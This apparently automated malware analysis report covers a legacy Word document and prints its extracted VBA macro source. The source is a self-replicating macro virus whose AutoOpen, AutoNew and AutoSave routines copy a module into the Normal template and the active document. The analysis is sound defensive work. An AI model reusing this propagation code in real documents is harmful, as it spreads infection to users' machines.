Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9e5d4adc8925859f…

MALICIOUS

Office (OLE)

32.0 KB Created: 1997-01-29 21:33:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 03815399f7aaf5d96c36102bf43fa681 SHA-1: 0fa2b8f96a08ed042bcc7d720244f5d7574fff64 SHA-256: 9e5d4adc8925859f925e291b5299b16f461f6cb6f385f0f6b3081ab04a2ecb90
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a legacy Word document containing VBA macros. The AutoOpen macro, detected by heuristics, is designed to copy the 'NewMacros1' module to both the Normal template and the active document. This suggests an attempt to establish persistence or facilitate further malicious actions. The script's logic for copying macros indicates a potential for self-propagation within the user's Office environment.

Heuristics 3

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4882 bytes
SHA-256: d3e27d42e292dc728d0ace988e1fdbb53f652ee262ec4a3fff6117cc09c03421
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros1"
Sub AutoNew()

Dim bFindInTempl, bFindInDoc As Boolean
bFindInTempl = False
bFindInDoc = False

'Èùåì â àêòèâíîì äîêóìåíòå
For Each xItem In ActiveDocument.VBProject.VBComponents
If xItem.Name = "NewMacros1" _
Then bFindInDoc = True
Next xItem

'Èùåì â áàçîâîì øàáëîíå
For Each xItem In NormalTemplate.VBProject.VBComponents
If xItem.Name = "NewMacros1" _
Then bFindInTempl = True
Next xItem

If bFindInTempl = True And bFindInFile = True Then
Application.OrganizerDelete Source:= _
        NormalTemplate.FullName, Name:="NewMacros1", _
        Object:=wdOrganizerObjectProjectItems
bFindInTempl = False
End If

'Íàøëè â øàáëîíå
If bFindInTempl = True And bFindInDoc = False Then
    Application.OrganizerCopy Source:= _
        NormalTemplate.FullName, _
        Destination:=ActiveDocument.FullName, Name:="NewMacros1", _
        Object:=wdOrganizerObjectProjectItems
End If

'... â äîêóìåíòå
If bFindInDoc = True And bFindInTempl = False Then
   Application.OrganizerCopy Source:= _
        ActiveDocument.FullName, _
        Destination:=NormalTemplate.FullName, Name:="NewMacros1", _
        Object:=wdOrganizerObjectProjectItems
End If

If Month(Now()) = 12 Then
Dim seconds As String
seconds = (31 - Day(Now())) * 24 * 60 * 60
Dim message As String
message = "Äî íîâîãî ãîäà îñòàëîñü: " + seconds + " ñåêóíä!"
r = MsgBox(message, vbInformation, "Ãîòîâñÿ!!!")
End If

End Sub

Sub AutoSave()

Dim bFindInTempl, bFindInDoc As Boolean
bFindInTempl = False
bFindInDoc = False

'Èùåì â àêòèâíîì äîêóìåíòå
For Each xItem In ActiveDocument.VBProject.VBComponents
If xItem.Name = "NewMacros1" _
Then bFindInDoc = True
Next xItem

'Èùåì â áàçîâîì øàáëîíå
For Each xItem In NormalTemplate.VBProject.VBComponents
If xItem.Name = "NewMacros1" _
Then bFindInTempl = True
Next xItem

If bFindInTempl = True And bFindInFile = True Then
Application.OrganizerDelete Source:= _
        NormalTemplate.FullName, Name:="NewMacros1", _
        Object:=wdOrganizerObjectProjectItems
bFindInTempl = False
End If

'Íàøëè â øàáëîíå
If bFindInTempl = True And bFindInDoc = False Then
    Application.OrganizerCopy Source:= _
        NormalTemplate.FullName, _
        Destination:=ActiveDocument.FullName, Name:="NewMacros1", _
        Object:=wdOrganizerObjectProjectItems
End If

'... â äîêóìåíòå
If bFindInDoc = True And bFindInTempl = False Then
   Application.OrganizerCopy Source:= _
        ActiveDocument.FullName, _
        Destination:=NormalTemplate.FullName, Name:="NewMacros1", _
        Object:=wdOrganizerObjectProjectItems
End If

If Month(Now()) = 12 Then
Dim seconds As String
seconds = (31 - Day(Now())) * 24 * 60 * 60
Dim message As String
message = "Äî íîâîãî ãîäà îñòàëîñü: " + seconds + " ñåêóíä!"
r = MsgBox(message, vbInformation, "Ãîòîâñÿ!!!")
End If

End Sub

Sub AutoOpen()

Dim bFindInTempl, bFindInDoc As Boolean
bFindInTempl = False
bFindInDoc = False

'Èùåì â àêòèâíîì äîêóìåíòå
For Each xItem In ActiveDocument.VBProject.VBComponents
If xItem.Name = "NewMacros1" _
Then bFindInDoc = True
Next xItem

'Èùåì â áàçîâîì øàáëîíå
For Each xItem In NormalTemplate.VBProject.VBComponents
If xItem.Name = "NewMacros1" _
Then bFindInTempl = True
Next xItem

If bFindInTempl = True And bFindInDoc = True Then
Application.OrganizerDelete Source:= _
        NormalTemplate.FullName, Name:="NewMacros1", _
        Object:=wdOrganizerObjectProjectItems
bFindInTempl = False
End If

'Íàøëè â øàáëîíå
If bFindInTempl = True And bFindInDoc = False Then
    Application.OrganizerCopy Source:= _
        NormalTemplate.FullName, _
        Destination:=ActiveDocument.FullName, Name:="NewMacros1", _
        Object:=wdOrganizerObjectProjectItems
End If

'... â äîêóìåíòå
If bFindInDoc
... (truncated)